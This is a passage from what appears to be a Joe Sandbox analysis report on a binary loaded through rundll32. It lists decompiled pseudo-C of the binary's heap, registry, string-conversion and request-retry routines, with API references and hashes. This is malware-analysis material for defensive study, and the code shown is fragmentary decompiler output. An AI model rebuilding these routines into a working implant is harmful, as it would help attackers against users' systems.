                                					_t5 = E01064B89(_t9, _a4); // executed
                                					if(_t5 == 0) {
                                						if(E01066B1C(_t9) != 0) {
                                							 *0x106a300 = 1; // executed
                                						}
                                						_t7 = E01063D2C(_t10); // executed
                                						return _t7;
                                					}
                                				}
                                				return _t5;
                                			}









                                0x01061cd6
                                0x01061cdf
                                0x01061ce5
                                0x01061cec
                                0x01061cf0
                                0x00000000
                                0x01061cf0
                                0x01061cfd
                                0x01061d02
                                0x01061d09
                                0x01061d0f
                                0x01061d16
                                0x01061d1f
                                0x01061d21
                                0x01061d21
                                0x01061d2b
                                0x00000000
                                0x01061d2b
                                0x01061d16
                                0x01061d30

                                APIs
                                • HeapCreate.KERNEL32(00000000,00400000,00000000,01065E54,?), ref: 01061CDF
                                • GetTickCount.KERNEL32 ref: 01061CF3
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: CountCreateHeapTick
                                • String ID:
                                • API String ID: 2177101570-0
                                • Opcode ID: b71ff97f52043f1a37989596f03e76d0d46290405536846154c2699d8f78cea6
                                • Instruction ID: 6a5e5a207219523c3c2b7db567591d400cdca794177fe3e93ffd747ac82c79a2
                                • Opcode Fuzzy Hash: b71ff97f52043f1a37989596f03e76d0d46290405536846154c2699d8f78cea6
                                • Instruction Fuzzy Hash: C5F06D70640303EEEB617B74AD0475A39EC6F60784F108825EAC5E50A5EBBAC0409722
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 92%
                                			E01061C03(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                                				signed int _v5;
                                				signed int _v12;
                                				void* _t32;
                                				signed int _t37;
                                				signed int _t39;
                                				signed char _t45;
                                				void* _t49;
                                				char* _t51;
                                				signed int _t65;
                                				signed int _t66;
                                				signed int _t69;
                                
                                				_v12 = _v12 & 0x00000000;
                                				_t69 = __eax;
                                				_t32 = RtlAllocateHeap( *0x106a2d8, 0, __eax << 2); // executed
                                				_t49 = _t32;
                                				if(_t49 == 0) {
                                					_v12 = 8;
                                				} else {
                                					 *_a8 = _t49;
                                					do {
                                						_t45 =  *_a4;
                                						asm("cdq");
                                						_t65 = 0x64;
                                						_t37 = (_t45 & 0x000000ff) / _t65;
                                						_v5 = _t37;
                                						if(_t37 != 0) {
                                							 *_t49 = _t37 + 0x30;
                                							_t49 = _t49 + 1;
                                							_t45 = _t45 + _t37 * 0x9c;
                                						}
                                						asm("cdq");
                                						_t66 = 0xa;
                                						_t39 = (_t45 & 0x000000ff) / _t66;
                                						if(_t39 != 0 || _v5 != _t39) {
                                							 *_t49 = _t39 + 0x30;
                                							_t49 = _t49 + 1;
                                							_t45 = _t45 + _t39 * 0xf6;
                                						}
                                						_a4 = _a4 + 1;
                                						 *_t49 = _t45 + 0x30;
                                						 *(_t49 + 1) = 0x2c;
                                						_t49 = _t49 + 2;
                                						_t69 = _t69 - 1;
                                					} while (_t69 != 0);
                                					_t51 = _t49 - 1;
                                					 *_a12 = _t51 -  *_a8;
                                					 *_t51 = 0;
                                				}
                                				return _v12;
                                			}














                                0x01061c08
                                0x01061c0d
                                0x01061c1b
                                0x01061c21
                                0x01061c25
                                0x01061c96
                                0x01061c27
                                0x01061c2b
                                0x01061c2e
                                0x01061c31
                                0x01061c38
                                0x01061c39
                                0x01061c3a
                                0x01061c3c
                                0x01061c41
                                0x01061c48
                                0x01061c4e
                                0x01061c4f
                                0x01061c4f
                                0x01061c56
                                0x01061c57
                                0x01061c58
                                0x01061c5c
                                0x01061c68
                                0x01061c6e
                                0x01061c6f
                                0x01061c6f
                                0x01061c71
                                0x01061c77
                                0x01061c79
                                0x01061c7e
                                0x01061c7f
                                0x01061c7f
                                0x01061c85
                                0x01061c8e
                                0x01061c90
                                0x01061c93
                                0x01061ca2

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01061C1B
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 7c7c12998958a19d306ccfadd824c1da728d9fe7143b115de620b8b011f18589
                                • Instruction ID: db8034b6cc16ea587918a23def9dee1c563f358c0df4e64d39611ede76911062
                                • Opcode Fuzzy Hash: 7c7c12998958a19d306ccfadd824c1da728d9fe7143b115de620b8b011f18589
                                • Instruction Fuzzy Hash: 8B110331285344AFEB168F2DD891BED7FA9DF93328F14408AE4809B292C277850BC760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0106375F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                                				intOrPtr _v12;
                                				signed int _v20;
                                				intOrPtr _v24;
                                				signed int _v60;
                                				char _v68;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				intOrPtr _t14;
                                				signed int* _t16;
                                				signed int _t25;
                                				signed int _t26;
                                				signed int* _t28;
                                				signed int _t30;
                                
                                				_t28 = __ecx;
                                				_t14 =  *0x106a368; // 0x5109618
                                				_v12 = _t14;
                                				_t16 = _a12;
                                				_t30 = 8;
                                				if(_t16 != 0) {
                                					 *_t16 =  *_t16 & 0x00000000;
                                				}
                                				do {
                                					_t31 =  &_v68;
                                					if(E0106227F( &_v68) == 0) {
                                						goto L16;
                                					}
                                					_t30 = E01066954(_t31, _a4, _v12);
                                					if(_t30 == 0) {
                                						_t25 = E01061CA5(_t31, _t28); // executed
                                						_t30 = _t25;
                                						if(_t30 != 0) {
                                							if(_t30 == 0x102) {
                                								E0106A000 = E0106A000 + 0xea60;
                                							}
                                						} else {
                                							if(_v24 != 0xc8) {
                                								_t30 = 0xe8;
                                							} else {
                                								_t26 = _v20;
                                								if(_t26 == 0) {
                                									_t30 = 0x10d2;
                                								} else {
                                									_t28 = _a8;
                                									if(_t28 != 0) {
                                										_v60 = _v60 & _t30;
                                										 *_t28 = _v60;
                                										_t28 = _a12;
                                										if(_t28 != 0) {
                                											 *_t28 = _t26;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                					E01064274( &_v68, 0x102, _t28, _t30);
                                					L16:
                                				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x106a30c, 0) == 0x102);
                                				return _t30;
                                			}

















                                0x0106375f
                                0x01063765
                                0x0106376c
                                0x01063774
                                0x0106377a
                                0x0106377d
                                0x0106377f
                                0x0106377f
                                0x01063787
                                0x01063787
                                0x01063791
                                0x00000000
                                0x00000000
                                0x010637a0
                                0x010637a4
                                0x010637a8
                                0x010637ad
                                0x010637b1
                                0x010637ed
                                0x010637ef
                                0x010637ef
                                0x010637b3
                                0x010637ba
                                0x010637e4
                                0x010637bc
                                0x010637bc
                                0x010637c1
                                0x010637dd
                                0x010637c3
                                0x010637c3
                                0x010637c8
                                0x010637cd
                                0x010637d0
                                0x010637d2
                                0x010637d7
                                0x010637d9
                                0x010637d9
                                0x010637d7
                                0x010637c8
                                0x010637c1
                                0x010637ba
                                0x010637b1
                                0x010637fc
                                0x01063801
                                0x01063801
                                0x01063825

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,76DC81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01063811
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait
                                • String ID:
                                • API String ID: 24740636-0
                                • Opcode ID: fa21b3d3a5f9cd3da574862293d5e7afaeb5a9a2b550d90c50e4f4664913c1eb
                                • Instruction ID: bdbd531abe9c18481d1fcc7213f6f9302cc0a908fb7e002a8bcfdd6d2b2dc886
                                • Opcode Fuzzy Hash: fa21b3d3a5f9cd3da574862293d5e7afaeb5a9a2b550d90c50e4f4664913c1eb
                                • Instruction Fuzzy Hash: 8321AEB5700246DBEF71DE5DD840BAE3BE9BFA1350F10407AE689AB250D779D801C790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 34%
                                			E01061B6F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                				intOrPtr _v12;
                                				void* _v18;
                                				char _v20;
                                				intOrPtr _t15;
                                				void* _t17;
                                				intOrPtr _t19;
                                				void* _t23;
                                
                                				_v20 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosw");
                                				_t15 =  *0x106a348; // 0x409d5a8
                                				_t4 = _t15 + 0x106b3a0; // 0x5108948
                                				_t20 = _t4;
                                				_t6 = _t15 + 0x106b124; // 0x650047
                                				_t17 = E010646CB(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                				if(_t17 < 0) {
                                					_t23 = _t17;
                                				} else {
                                					_t23 = 8;
                                					if(_v20 != _t23) {
                                						_t23 = 1;
                                					} else {
                                						_t19 = E010659AE(_t20, _v12);
                                						if(_t19 != 0) {
                                							 *_a16 = _t19;
                                							_t23 = 0;
                                						}
                                						__imp__#6(_v12);
                                					}
                                				}
                                				return _t23;
                                			}










                                0x01061b79
                                0x01061b80
                                0x01061b81
                                0x01061b82
                                0x01061b83
                                0x01061b89
                                0x01061b8e
                                0x01061b8e
                                0x01061b98
                                0x01061baa
                                0x01061bb1
                                0x01061bdf
                                0x01061bb3
                                0x01061bb5
                                0x01061bba
                                0x01061bdc
                                0x01061bbc
                                0x01061bbf
                                0x01061bc6
                                0x01061bcb
                                0x01061bcd
                                0x01061bcd
                                0x01061bd2
                                0x01061bd2
                                0x01061bba
                                0x01061be6

                                APIs
                                  • Part of subcall function 010646CB: SysFreeString.OLEAUT32(?), ref: 010647AA
                                  • Part of subcall function 010659AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,01065EFA,004F0053,00000000,?), ref: 010659B7
                                  • Part of subcall function 010659AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,01065EFA,004F0053,00000000,?), ref: 010659E1
                                  • Part of subcall function 010659AE: memset.NTDLL ref: 010659F5
                                • SysFreeString.OLEAUT32(00000000), ref: 01061BD2
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: FreeString$lstrlenmemcpymemset
                                • String ID:
                                • API String ID: 397948122-0
                                • Opcode ID: 211de525977213bf0127857ea8362de1d4d9f9ba46c7c66837df915fd8b1e056
                                • Instruction ID: 4a2ec2c9883a82aa1ea9d2989e1e60e607810fbad78287eb7ea596e91d2c28cf
                                • Opcode Fuzzy Hash: 211de525977213bf0127857ea8362de1d4d9f9ba46c7c66837df915fd8b1e056
                                • Instruction Fuzzy Hash: 2B01563260012ABFDB12AFA8DC05DEABBB9FF48650B004465FA81E7060E7719915CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 89%
                                			E01062E4E(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
                                				char _v8;
                                				void* _t14;
                                				intOrPtr _t17;
                                				void* _t20;
                                				void* _t26;
                                
                                				_push(__ecx);
                                				if(_a4 == 0 || __eax == 0) {
                                					_t26 = 0x57;
                                				} else {
                                					_t14 = E01061C03(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
                                					_t26 = _t14;
                                					if(_t26 == 0) {
                                						_t17 =  *0x106a348; // 0x409d5a8
                                						_t9 = _t17 + 0x106ba40; // 0x444f4340
                                						_t20 = E01063B58( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
                                						_t26 = _t20;
                                						RtlFreeHeap( *0x106a2d8, 0, _a4); // executed
                                					}
                                				}
                                				return _t26;
                                			}








                                0x01062e51
                                0x01062e57
                                0x01062eae
                                0x01062e5d
                                0x01062e68
                                0x01062e6d
                                0x01062e71
                                0x01062e7e
                                0x01062e86
                                0x01062e92
                                0x01062e9a
                                0x01062ea4
                                0x01062ea4
                                0x01062e71
                                0x01062eb3

                                APIs
                                  • Part of subcall function 01061C03: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01061C1B
                                  • Part of subcall function 01063B58: lstrlen.KERNEL32(76DDF710,?,00000000,?,76DDF710), ref: 01063B8C
                                  • Part of subcall function 01063B58: StrStrA.SHLWAPI(00000000,?), ref: 01063B99
                                  • Part of subcall function 01063B58: RtlAllocateHeap.NTDLL(00000000,?), ref: 01063BB8
                                • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,0106553D), ref: 01062EA4
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Allocate$Freelstrlen
                                • String ID:
                                • API String ID: 2220322926-0
                                • Opcode ID: d2e4bbea1506e9944ab9e006108d6bf010c6ac696b47438fb8477f6300ef6067
                                • Instruction ID: 7cd80cca4610d5ff6c4e622b37e6ae6697177adbfcc8ef7c2fa82bd5de23aff5
                                • Opcode Fuzzy Hash: d2e4bbea1506e9944ab9e006108d6bf010c6ac696b47438fb8477f6300ef6067
                                • Instruction Fuzzy Hash: EB018176200109FFDB21DF48CC00EEA7BEDEB54350F104029FA8597164E772EA45DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E01064675(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                				intOrPtr _t14;
                                				void* _t16;
                                				void* _t17;
                                				void* _t18;
                                
                                				if(_a4 == 0) {
                                					L2:
                                					_t18 =  *0x106a0c8(_a8, _a12,  &_a4);
                                					if(_t18 == 0) {
                                						RegCloseKey(_a4);
                                					}
                                					L4:
                                					return _t18;
                                				}
                                				_t14 =  *0x106a348; // 0x409d5a8
                                				_t2 = _t14 + 0x106b180; // 0x720043
                                				_t16 = E010646CB(_t17, _a4, _a8, _a12, _t2, 0, 0, 0); // executed
                                				_t18 = _t16;
                                				if(_t18 == 0) {
                                					goto L4;
                                				}
                                				goto L2;
                                			}







                                0x0106467d
                                0x010646a5
                                0x010646b5
                                0x010646b9
                                0x010646be
                                0x010646be
                                0x010646c4
                                0x010646c8
                                0x010646c8
                                0x0106467f
                                0x0106468a
                                0x0106469a
                                0x0106469f
                                0x010646a3
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • RegCloseKey.ADVAPI32(00000000,?,01066F4E,3D010690,00000000,80000002,?,80000002,?,?,?,01063520,80000002), ref: 010646BE
                                  • Part of subcall function 010646CB: SysFreeString.OLEAUT32(?), ref: 010647AA
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: CloseFreeString
                                • String ID:
                                • API String ID: 3574410727-0
                                • Opcode ID: 49e04349b0597aedbdea6de83c410fd12482c2baadd501f06a66a6c8f8a4f785
                                • Instruction ID: e37db78d06d439ce6e6aae2acfae02ec49ae8ae8adc9fa795696b068a1b1f036
                                • Opcode Fuzzy Hash: 49e04349b0597aedbdea6de83c410fd12482c2baadd501f06a66a6c8f8a4f785
                                • Instruction Fuzzy Hash: FAF0DA32601619FBEB229F84DC44FE97BA9AB08B50F148160FE84EA170C772DD649B95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E01066D63(long _a4) {
                                				void* _t2;
                                
                                				_t2 = RtlAllocateHeap( *0x106a2d8, 0, _a4); // executed
                                				return _t2;
                                			}




                                0x01066d6f
                                0x01066d75

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 58d43a19a2cd35a0f3a34cb12375939276a318044908b673174fe7465c37e67e
                                • Instruction ID: dc6f23b94c0ed431df6bb8897d18a9e441b70546dde7b160510310c55d266711
                                • Opcode Fuzzy Hash: 58d43a19a2cd35a0f3a34cb12375939276a318044908b673174fe7465c37e67e
                                • Instruction Fuzzy Hash: 47B01231140200EFDA216B00DD08F057B21BB50700F004010F28450078C2370460FB04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E01066C2C(void* _a4) {
                                				char _t2;
                                
                                				_t2 = RtlFreeHeap( *0x106a2d8, 0, _a4); // executed
                                				return _t2;
                                			}




                                0x01066c38
                                0x01066c3e

                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,01065E1D,00000000,?,?,00000000), ref: 01066C38
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 980c8bf2bf621a4a263a1217431773e44b2dae3bad76fa1c897739f94abe3379
                                • Instruction ID: 005359721abdc86da8ceef7f62d4622131f47ddf97895b01a4ea5edf8aeb30b1
                                • Opcode Fuzzy Hash: 980c8bf2bf621a4a263a1217431773e44b2dae3bad76fa1c897739f94abe3379
                                • Instruction Fuzzy Hash: 1EB01271240200FFDB316B40DE04F057A21AB50704F004010F3841107882370420FB15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E010613C7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                                				void* _v8;
                                				int _v12;
                                				char _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				char _v32;
                                				char _v144;
                                				int _v148;
                                				intOrPtr _v152;
                                				intOrPtr _v156;
                                				intOrPtr _v160;
                                				char _v164;
                                				void* _t37;
                                				void* _t42;
                                				void* _t51;
                                				int _t53;
                                				void* _t60;
                                				void* _t63;
                                				void* _t64;
                                
                                				_t53 = 0;
                                				_t60 = __ecx;
                                				_v16 = 0;
                                				_v12 = 0;
                                				_v8 = 0;
                                				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                                					L21:
                                					return _t53;
                                				} else {
                                					_t58 =  &_v164;
                                					_t37 = E01066FD0(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                                					if(_t37 != 0) {
                                						goto L21;
                                					}
                                					_t61 = _t60 - 0x80;
                                					if(_v148 > _t60 - 0x80) {
                                						goto L21;
                                					}
                                					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                                						_t37 = _t37 + 1;
                                						if(_t37 < 0x10) {
                                							continue;
                                						}
                                						_t53 = _v148;
                                						_t51 = E01066D63(_t53);
                                						_v8 = _t51;
                                						_t73 = _t51;
                                						if(_t51 != 0) {
                                							_t53 = 0;
                                							L18:
                                							if(_t53 != 0) {
                                								goto L21;
                                							}
                                							L19:
                                							if(_v8 != 0) {
                                								E01066C2C(_v8);
                                							}
                                							goto L21;
                                						}
                                						memcpy(_t51, _a4, _t53);
                                						L8:
                                						_t63 = _v8;
                                						E01066EE7(_t58, _t73, _t63, _t53,  &_v32);
                                						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                                							L15:
                                							_t53 = 0;
                                							goto L19;
                                						} else {
                                							 *_a8 = _t63;
                                							goto L18;
                                						}
                                					}
                                					_t58 =  &_v144;
                                					_t42 = E01065FBB(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
                                					__eflags = _t42;
                                					if(_t42 != 0) {
                                						_t53 = _v12;
                                						goto L18;
                                					}
                                					_t53 = _v148;
                                					__eflags = _v12 - _t53;
                                					if(__eflags >= 0) {
                                						goto L8;
                                					}
                                					goto L15;
                                				}
                                			}























                                0x010613d2
                                0x010613d5
                                0x010613dc
                                0x010613df
                                0x010613e2
                                0x010613e7
                                0x010614e3
                                0x010614e7
                                0x010613f9
                                0x01061405
                                0x0106140c
                                0x01061413
                                0x00000000
                                0x00000000
                                0x01061419
                                0x01061421
                                0x00000000
                                0x00000000
                                0x01061427
                                0x01061430
                                0x01061434
                                0x00000000
                                0x00000000
                                0x01061436
                                0x0106143d
                                0x01061442
                                0x01061445
                                0x01061447
                                0x010614c8
                                0x010614cf
                                0x010614d1
                                0x00000000
                                0x00000000
                                0x010614d3
                                0x010614d7
                                0x010614dc
                                0x010614dc
                                0x00000000
                                0x010614d7
                                0x0106144e
                                0x01061456
                                0x01061456
                                0x0106145f
                                0x0106146d
                                0x010614c4
                                0x010614c4
                                0x00000000
                                0x01061490
                                0x01061493
                                0x00000000
                                0x01061493
                                0x0106146d
                                0x010614a2
                                0x010614b0
                                0x010614b5
                                0x010614b7
                                0x010614cc
                                0x00000000
                                0x010614cc
                                0x010614b9
                                0x010614bf
                                0x010614c2
                                0x00000000
                                0x00000000
                                0x00000000
                                0x010614c2

                                APIs
                                • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,?,?), ref: 0106144E
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                                • Instruction ID: f22f2abf7fcce0097836971b823a03f24c74d17c7cd963e3c123676d32f41365
                                • Opcode Fuzzy Hash: c648886f1a2ec85e852e477e5d42c8655359d0f0dd47989d6feb885f83cc499d
                                • Instruction Fuzzy Hash: 08313E71901119EFDF61DFA8C9C0BEEB7BDBB44354F1444A9E689A7182DA309E84CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0106155C(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                                				void* _t21;
                                				void* _t22;
                                				signed int _t24;
                                				intOrPtr* _t26;
                                				void* _t27;
                                
                                				_t26 = __edi;
                                				if(_a4 == 0) {
                                					L2:
                                					_t27 = E010612CA(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                					if(_t27 == 0) {
                                						_t24 = _a12 >> 1;
                                						if(_t24 == 0) {
                                							_t27 = 2;
                                							HeapFree( *0x106a2d8, 0, _a4);
                                						} else {
                                							_t21 = _a4;
                                							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                							 *_t26 = _t21;
                                						}
                                					}
                                					L6:
                                					return _t27;
                                				}
                                				_t22 = E01061B6F(_a4, _a8, _a12, __edi); // executed
                                				_t27 = _t22;
                                				if(_t27 == 0) {
                                					goto L6;
                                				}
                                				goto L2;
                                			}








                                0x0106155c
                                0x01061564
                                0x0106157b
                                0x01061596
                                0x0106159a
                                0x0106159f
                                0x010615a1
                                0x010615b3
                                0x010615bf
                                0x010615a3
                                0x010615a3
                                0x010615a8
                                0x010615ad
                                0x010615ad
                                0x010615a1
                                0x010615c5
                                0x010615c9
                                0x010615c9
                                0x01061570
                                0x01061575
                                0x01061579
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                  • Part of subcall function 01061B6F: SysFreeString.OLEAUT32(00000000), ref: 01061BD2
                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76DDF710,?,00000000,?,00000000,?,010621A9,?,004F0053,05109400,00000000,?), ref: 010615BF
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Free$HeapString
                                • String ID:
                                • API String ID: 3806048269-0
                                • Opcode ID: 103d16f81ee4df438ae5beeed805dc69e7795780f6f557a6dfd0b63cec9d77f9
                                • Instruction ID: 77335a75b4f1a79c7a2ea4501b9227244cde4bb0b3f91fde4ea1832eebffa9fe
                                • Opcode Fuzzy Hash: 103d16f81ee4df438ae5beeed805dc69e7795780f6f557a6dfd0b63cec9d77f9
                                • Instruction Fuzzy Hash: 83016D3210061AFBDB229F98CC01EEE7FA9EF98750F088428FE459A164D731D960DBD0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E010624B3(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                				void* _t13;
                                				void* _t21;
